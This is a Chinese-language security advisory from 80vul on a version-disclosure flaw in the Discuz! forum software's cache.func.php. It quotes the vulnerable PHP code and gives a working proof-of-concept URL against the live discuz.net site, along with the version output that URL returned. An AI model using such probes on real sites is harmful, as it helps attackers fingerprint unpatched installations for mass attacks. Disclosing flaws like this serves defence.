Discuz! cache.func.php 信息泄漏 bug
由于Discuz!的\include\cache.func.php缺少访问限制导致版本及补丁消息的泄露.
author: 80vul-A
team:http://www.80vul.com
漏洞存在于文件\include\cache.func.php里的代码如下:
define('DISCUZ_KERNEL_VERSION', '6.1.0');
define('DISCUZ_KERNEL_RELEASE', '20080418');
if(isset($_GET['kernel_version'])) {
exit('Crossday Discuz! Board<br />Developed by Comsenz Inc.<br /><br />Version: '.DISCUZ_KERNEL_VERSION.'<br />Release: '.DISCUZ_KERNEL_RELEASE);
} elseif(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
提交kernel_version的时会显示版本及补丁信息,如果攻击者结合google-hacking等技术很容易找到没有升级的程序,导致mass类攻击.
poc:
http://www.discuz.net/include/cache.func.php?kernel_version=1
显示:
Crossday Discuz! Board
Developed by Comsenz Inc.
Version: 7.0.0
Release: 20081031
[难道官方是打算1031发布7.00,不知道杂的又推迟了:(]